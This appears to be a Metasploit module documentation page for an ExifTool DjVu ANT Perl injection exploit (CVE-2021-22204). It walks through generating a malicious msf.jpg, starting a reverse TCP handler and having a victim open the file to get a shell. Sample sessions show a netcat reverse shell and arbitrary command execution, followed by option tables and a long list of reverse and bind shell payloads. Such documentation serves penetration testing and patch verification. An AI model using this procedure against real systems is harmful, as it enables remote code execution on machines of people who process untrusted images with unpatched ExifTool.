ExifTool DjVu ANT Perl injection - Metasploit
This page contains detailed information about how to use the exploit/unix/fileformat/exiftool_djvu_ant_perl_injection metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: ExifTool DjVu ANT Perl injection
Module: exploit/unix/fileformat/exiftool_djvu_ant_perl_injection
Source code: modules/exploits/unix/fileformat/exiftool_djvu_ant_perl_injection.rb
Disclosure date: 2021-05-24
Last modification time: 2021-05-11 12:11:22 +0000
Supported architecture(s): cmd
Supported platform(s): Unix
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2021-22204
This module exploits a Perl injection vulnerability in the DjVu ANT parsing code of ExifTool versions 7.44 through 12.23 inclusive. The injection is used to execute a shell command using Perl backticks. The DjVu image can be embedded in a wrapper image using the HasselbladExif EXIF field.
Module Ranking and Traits
Module Ranking:
- excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.
Basic Usage
msf > use exploit/unix/fileformat/exiftool_djvu_ant_perl_injection
msf exploit(exiftool_djvu_ant_perl_injection) > show targets
... a list of targets ...
msf exploit(exiftool_djvu_ant_perl_injection) > set TARGET target-id
msf exploit(exiftool_djvu_ant_perl_injection) > show options
... show and set options ...
msf exploit(exiftool_djvu_ant_perl_injection) > exploit
Knowledge Base
Vulnerable Application
ExifTool is vulnerable to Perl injection when parsing a crafted DjVu ANT (Annotation) section. Using the 'HasselbladExif' EXIF field, a DjVu file containing the ANT data can be embedded in another file, such as a JPEG or TIFF file. Upon passing a crafted DjVu file or a "wrapped" DjVu file to ExifTool, arbitrary Perl code can be executed.
Perl backticks are used to execute shell commands.
The vulnerability affects ExifTool 7.44 through 12.23 inclusive.
A copy of the vulnerable software can be obtained at https://github.com/exiftool/exiftool/releases/tag/12.23
The .tar.gz
can simply be unpacked and used as-is:
% tar -xf 12.23.tar.gz
% ./exiftool-12.23/exiftool exiftool-12.23/t/images/Writer.jpg
ExifTool Version Number : 12.23
File Name : Writer.jpg
Directory : exiftool-12.23/t/images
File Size : 251 bytes
File Modification Date/Time : 2021:04:02 05:24:21+11:00
File Access Date/Time : 2021:05:04 20:57:46+10:00
File Inode Change Date/Time : 2021:05:04 20:57:46+10:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
Image Width : 8
Image Height : 8
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 8x8
Megapixels : 0.000064
Verification Steps
- Obtain the vulnerable application
- Start
msfconsole
- Do:
use exploit/unix/fileformat/exiftool_djvu_ant_perl_injection
- Set the payload and payload options as appropriate
- Do:
exploit
- Start a handler
- Transfer the generated
msf.jpg
file to the machine running the vulnerable application - On the victim machine, do
exiftool msf.jpg
- You should get a shell
Options
TARGET
- you can choose between JPEG (Default), TIFF and DjVuFILENAME
- the name of the image file to produce. Note that it is safe to rename a file after it has been generated.
Scenarios
ExifTool 12.23 - Reverse TCP shell
Generate the image file
msf6 > use exploit/unix/fileformat/exiftool_djvu_ant_perl_injection
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(unix/fileformat/exiftool_djvu_ant_perl_injection) > set LHOST 127.0.0.1
LHOST => 127.0.0.1
msf6 exploit(unix/fileformat/exiftool_djvu_ant_perl_injection) > set LPORT 4444
LPORT => 4444
msf6 exploit(unix/fileformat/exiftool_djvu_ant_perl_injection) > exploit
[+] msf.jpg stored at /home/justin/.msf4/local/msf.jpg
msf6 exploit(unix/fileformat/exiftool_djvu_ant_perl_injection) >
Start a handler
msf6 exploit(unix/fileformat/exiftool_djvu_ant_perl_injection) > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set LHOST 127.0.0.1
LHOST => 127.0.0.1
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) > exploit
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444
As the victim, use ExifTool to analyse the image
% ~/exiftool-12.23/exiftool /home/justin/.msf4/local/msf.jpg
ExifTool will hang and a shell session will be opened
[*] Command shell session 1 opened (127.0.0.1:4444 -> 127.0.0.1:38606) at 2021-05-04 21:07:37 +1000
id
uid=31337(justin) gid=31337(justin) groups=31337(justin),27(sudo)
ExifTool 12.23 - Arbitrary command execution
Generate the image file
msf6 > use exploit/unix/fileformat/exiftool_djvu_ant_perl_injection
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(unix/fileformat/exiftool_djvu_ant_perl_injection) > set PAYLOAD cmd/unix/generic
PAYLOAD => cmd/unix/generic
msf6 exploit(unix/fileformat/exiftool_djvu_ant_perl_injection) > set CMD 'echo "Pwned as $(id)"'
CMD => echo "Pwned as $(id)"
msf6 exploit(unix/fileformat/exiftool_djvu_ant_perl_injection) > exploit
[+] msf.jpg stored at /home/justin/.msf4/local/msf.jpg
msf6 exploit(unix/fileformat/exiftool_djvu_ant_perl_injection) >
As the victim, use ExifTool to analyse the image. The STDOUT of CMD will be reflected in the 'Author' EXIF field.
% ~/exiftool-12.23/exiftool /home/justin/.msf4/local/msf.jpg | grep Author
Author : .Pwned as uid=31337(justin) gid=31337(justin) groups=31337(justin),27(sudo).
Go back to menu.
Msfconsole Usage
Here is how the unix/fileformat/exiftool_djvu_ant_perl_injection exploit module looks in the msfconsole:
msf6 > use exploit/unix/fileformat/exiftool_djvu_ant_perl_injection
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(unix/fileformat/exiftool_djvu_ant_perl_injection) > show info
Name: ExifTool DjVu ANT Perl injection
Module: exploit/unix/fileformat/exiftool_djvu_ant_perl_injection
Platform: Unix
Arch: cmd
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2021-05-24
Provided by:
William Bowling
Justin Steven
Available targets:
Id Name
-- ----
0 JPEG file
1 TIFF file
2 DjVu file
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME msf.jpg yes Output file
Payload information:
Space: 2000
Avoid: 5 characters
Description:
This module exploits a Perl injection vulnerability in the DjVu ANT
parsing code of ExifTool versions 7.44 through 12.23 inclusive. The
injection is used to execute a shell command using Perl backticks.
The DjVu image can be embedded in a wrapper image using the
HasselbladExif EXIF field.
References:
https://nvd.nist.gov/vuln/detail/CVE-2021-22204
https://twitter.com/wcbowling/status/1385803927321415687
https://github.com/exiftool/exiftool/commit/cf0f4e7dcd024ca99615bfd1102a841a25dde031
https://www.openwall.com/lists/oss-security/2021/05/10/5
Module Options
This is a complete list of options available in the unix/fileformat/exiftool_djvu_ant_perl_injection exploit:
msf6 exploit(unix/fileformat/exiftool_djvu_ant_perl_injection) > show options
Module options (exploit/unix/fileformat/exiftool_djvu_ant_perl_injection):
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME msf.jpg yes Output file
Payload options (cmd/unix/reverse_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.204.3 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
**DisablePayloadHandler: True (no handler will be created!)**
Exploit target:
Id Name
-- ----
0 JPEG file
Advanced Options
Here is a complete list of advanced options supported by the unix/fileformat/exiftool_djvu_ant_perl_injection exploit:
msf6 exploit(unix/fileformat/exiftool_djvu_ant_perl_injection) > show advanced
Module advanced options (exploit/unix/fileformat/exiftool_djvu_ant_perl_injection):
Name Current Setting Required Description
---- --------------- -------- -----------
ContextInformationFile no The information file that contains context information
DisablePayloadHandler true no Disable the handler code for the selected payload
EnableContextEncoding false no Use transient context when encoding payloads
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
WfsDelay 2 no Additional delay in seconds to wait for a session
Payload advanced options (cmd/unix/reverse_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
CreateSession true no Create a new session for every successful login
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Exploit Targets
Here is a list of targets (platforms and systems) which the unix/fileformat/exiftool_djvu_ant_perl_injection module can exploit:
msf6 exploit(unix/fileformat/exiftool_djvu_ant_perl_injection) > show targets
Exploit targets:
Id Name
-- ----
0 JPEG file
1 TIFF file
2 DjVu file
Compatible Payloads
This is a list of possible payloads which can be delivered and executed on the target system using the unix/fileformat/exiftool_djvu_ant_perl_injection exploit:
msf6 exploit(unix/fileformat/exiftool_djvu_ant_perl_injection) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/cmd/unix/bind_awk normal No Unix Command Shell, Bind TCP (via AWK)
1 payload/cmd/unix/bind_busybox_telnetd normal No Unix Command Shell, Bind TCP (via BusyBox telnetd)
2 payload/cmd/unix/bind_jjs normal No Unix Command Shell, Bind TCP (via jjs)
3 payload/cmd/unix/bind_lua normal No Unix Command Shell, Bind TCP (via Lua)
4 payload/cmd/unix/bind_netcat normal No Unix Command Shell, Bind TCP (via netcat)
5 payload/cmd/unix/bind_netcat_gaping normal No Unix Command Shell, Bind TCP (via netcat -e)
6 payload/cmd/unix/bind_netcat_gaping_ipv6 normal No Unix Command Shell, Bind TCP (via netcat -e) IPv6
7 payload/cmd/unix/bind_perl normal No Unix Command Shell, Bind TCP (via Perl)
8 payload/cmd/unix/bind_perl_ipv6 normal No Unix Command Shell, Bind TCP (via perl) IPv6
9 payload/cmd/unix/bind_r normal No Unix Command Shell, Bind TCP (via R)
10 payload/cmd/unix/bind_ruby normal No Unix Command Shell, Bind TCP (via Ruby)
11 payload/cmd/unix/bind_ruby_ipv6 normal No Unix Command Shell, Bind TCP (via Ruby) IPv6
12 payload/cmd/unix/bind_socat_udp normal No Unix Command Shell, Bind UDP (via socat)
13 payload/cmd/unix/bind_stub normal No Unix Command Shell, Bind TCP (stub)
14 payload/cmd/unix/bind_zsh normal No Unix Command Shell, Bind TCP (via Zsh)
15 payload/cmd/unix/generic normal No Unix Command, Generic Command Execution
16 payload/cmd/unix/pingback_bind normal No Unix Command Shell, Pingback Bind TCP (via netcat)
17 payload/cmd/unix/pingback_reverse normal No Unix Command Shell, Pingback Reverse TCP (via netcat)
18 payload/cmd/unix/reverse normal No Unix Command Shell, Double Reverse TCP (telnet)
19 payload/cmd/unix/reverse_awk normal No Unix Command Shell, Reverse TCP (via AWK)
20 payload/cmd/unix/reverse_bash normal No Unix Command Shell, Reverse TCP (/dev/tcp)
21 payload/cmd/unix/reverse_bash_telnet_ssl normal No Unix Command Shell, Reverse TCP SSL (telnet)
22 payload/cmd/unix/reverse_bash_udp normal No Unix Command Shell, Reverse UDP (/dev/udp)
23 payload/cmd/unix/reverse_jjs normal No Unix Command Shell, Reverse TCP (via jjs)
24 payload/cmd/unix/reverse_ksh normal No Unix Command Shell, Reverse TCP (via Ksh)
25 payload/cmd/unix/reverse_lua normal No Unix Command Shell, Reverse TCP (via Lua)
26 payload/cmd/unix/reverse_ncat_ssl normal No Unix Command Shell, Reverse TCP (via ncat)
27 payload/cmd/unix/reverse_netcat normal No Unix Command Shell, Reverse TCP (via netcat)
28 payload/cmd/unix/reverse_netcat_gaping normal No Unix Command Shell, Reverse TCP (via netcat -e)
29 payload/cmd/unix/reverse_openssl normal No Unix Command Shell, Double Reverse TCP SSL (openssl)
30 payload/cmd/unix/reverse_perl normal No Unix Command Shell, Reverse TCP (via Perl)
31 payload/cmd/unix/reverse_perl_ssl normal No Unix Command Shell, Reverse TCP SSL (via perl)
32 payload/cmd/unix/reverse_php_ssl normal No Unix Command Shell, Reverse TCP SSL (via php)
33 payload/cmd/unix/reverse_python normal No Unix Command Shell, Reverse TCP (via Python)
34 payload/cmd/unix/reverse_python_ssl normal No Unix Command Shell, Reverse TCP SSL (via python)
35 payload/cmd/unix/reverse_r normal No Unix Command Shell, Reverse TCP (via R)
36 payload/cmd/unix/reverse_ruby normal No Unix Command Shell, Reverse TCP (via Ruby)
37 payload/cmd/unix/reverse_ruby_ssl normal No Unix Command Shell, Reverse TCP SSL (via Ruby)
38 payload/cmd/unix/reverse_socat_udp normal No Unix Command Shell, Reverse UDP (via socat)
39 payload/cmd/unix/reverse_ssh normal No Unix Command Shell, Reverse TCP SSH
40 payload/cmd/unix/reverse_ssl_double_telnet normal No Unix Command Shell, Double Reverse TCP SSL (telnet)
41 payload/cmd/unix/reverse_stub normal No Unix Command Shell, Reverse TCP (stub)
42 payload/cmd/unix/reverse_tclsh normal No Unix Command Shell, Reverse TCP (via Tclsh)
43 payload/cmd/unix/reverse_zsh normal No Unix Command Shell, Reverse TCP (via Zsh)
44 payload/generic/custom normal No Custom Payload
45 payload/generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
46 payload/generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
Evasion Options
Here is the full list of possible evasion options supported by the unix/fileformat/exiftool_djvu_ant_perl_injection exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 exploit(unix/fileformat/exiftool_djvu_ant_perl_injection) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Go back to menu.
Related Pull Requests
References
- CVE-2021-22204
- https://twitter.com/wcbowling/status/1385803927321415687
- https://github.com/exiftool/exiftool/commit/cf0f4e7dcd024ca99615bfd1102a841a25dde031
- https://www.openwall.com/lists/oss-security/2021/05/10/5
See Also
Check also the following modules related to this module:
- exploit/multi/http/gitlab_exif_rce
- exploit/unix/fileformat/ghostscript_type_confusion
- exploit/unix/fileformat/imagemagick_delegate
- exploit/unix/fileformat/metasploit_libnotify_cmd_injection
- exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection
- exploit/unix/webapp/actualanalyzer_ant_cookie_exec
- exploit/unix/webapp/instantcms_exec
- exploit/unix/local/exim_perl_startup
- exploit/unix/dhcp/rhel_dhcp_client_command_injection
- exploit/unix/http/pfsense_graph_injection_exec
- exploit/unix/webapp/ajenti_auth_username_cmd_injection
- exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection
- exploit/unix/webapp/opennetadmin_ping_cmd_injection
- exploit/windows/fileformat/djvu_imageurl
- encoder/cmd/perl
- payload/cmd/unix/bind_perl
- payload/cmd/unix/bind_perl_ipv6
- payload/cmd/unix/reverse_perl
- payload/cmd/unix/reverse_perl_ssl
- payload/cmd/windows/bind_perl
- payload/cmd/windows/bind_perl_ipv6
- payload/cmd/windows/reverse_perl
- payload/php/bind_perl
- payload/php/bind_perl_ipv6
- payload/php/reverse_perl
Related Nessus plugins:
- Debian DSA-4910-1 : libimage-exiftool-perl - security update
- Debian DLA-2663-1 : libimage-exiftool-perl security update
- openSUSE Security Update : perl-Image-ExifTool (openSUSE-2021-707)
- Ubuntu 18.04 LTS / 20.04 LTS / 20.10 / 21.04 : ExifTool vulnerability (USN-4987-1)
Authors
- William Bowling
- Justin Steven
Version
This page has been produced using Metasploit Framework version 6.1.28-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.